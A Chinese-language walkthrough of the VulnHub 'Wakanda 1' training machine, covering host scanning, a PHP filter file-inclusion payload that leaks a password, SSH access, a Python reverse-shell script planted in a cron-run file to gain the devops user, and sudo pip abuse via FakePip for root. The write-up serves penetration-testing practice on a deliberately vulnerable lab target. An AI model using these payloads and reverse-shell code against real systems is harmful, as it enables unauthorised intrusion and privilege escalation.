渗透测试之靶机试炼（四）

靶机简介

靶机地址：
https://www.vulnhub.com/entry/wakanda-1,251/#

运行环境：
VirtualBox

攻击测试机环境
kali
win 10

工具简介
msf
dirb
nmap
nc
python

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。

信息收集

靶机没有给出ip，使用nmap主机发现功能。
命令：nmap 10.211.55.0/24 -v -A

找到靶机ip 10.211.55.24，以及靶机开放端口80（web）、111（rpc）3333（ssh），访问80端口发现网站主页，但没有发现有用信息。
之后进行目录爆破无果，又回到主页上，查看主页源码，发现一串注释的字符。
根据提示存在lang参数，在链接后加上相应参数 http://10.211.55.24/?lang=fr，访问发现主页变为发文，根据这个参数怀疑是否存在文件包含漏洞。
使用php为协议进行文件包含测试，包含主页
链接：http://10.211.55.24/?lang=php://filter/convert.base64-encode/resource=index
发现上边多出来一段加密字符，base64解密后得到一个密码
查看源码，在源码内发现一个疑似用户名的字符串 mamadou
ssh链接成功，账户mamadou，密码Niamey4Ever227!!!
获取到一个python执行的权限，我们可以利用Python获取一个交互式shell
命令： import pty；
pty.spawn(“/bin/bash");
在当前目录下发现一个flag。

提权

之后进行信息收集，在home下发现两个用户文件夹，在decops下发现flag2，没有读权限，下一步就是提权到decops用户。
在tmp目录下发现test，发现其创建时间和所属者和所属组都与其他文件不一致，查看靶机时间，发现时三分钟前创建的，怀疑有定时执行脚本存在
利用find命令，查看所属者为devops的文件找到一个python文件。/srv/.antivirus.py
ok,找到这个文件后，我们使用vi命令编辑他，在其内写一个pythonfantanshell的脚本。
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“10.211.55.8”,5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
保存，再笨机上监听5555 端口
ok，弹回来一个shell，权限为devops，获取到第二个flag
再次进行信息收集，找了半天也没找到可利用的，最后世界sudo -l 尝试发现问题。
提示只有pip可以无密码执行sudo命令，那么这里就需要利用pip进行提权，相关利用源码可在github下载
链接：https://github.com/0x00-0x00/FakePip.git
下载源码
编辑setup.py，替换其中的lhost为自己的ip
再本机开启简单的web服务。
再靶机shell上下载setup.py文件
本地监听13372端口，
在靶机上执行命令
sudo /usr/bin/pip install . --upgrade --force-reinstall
获取到root权限，拿到最后一个flag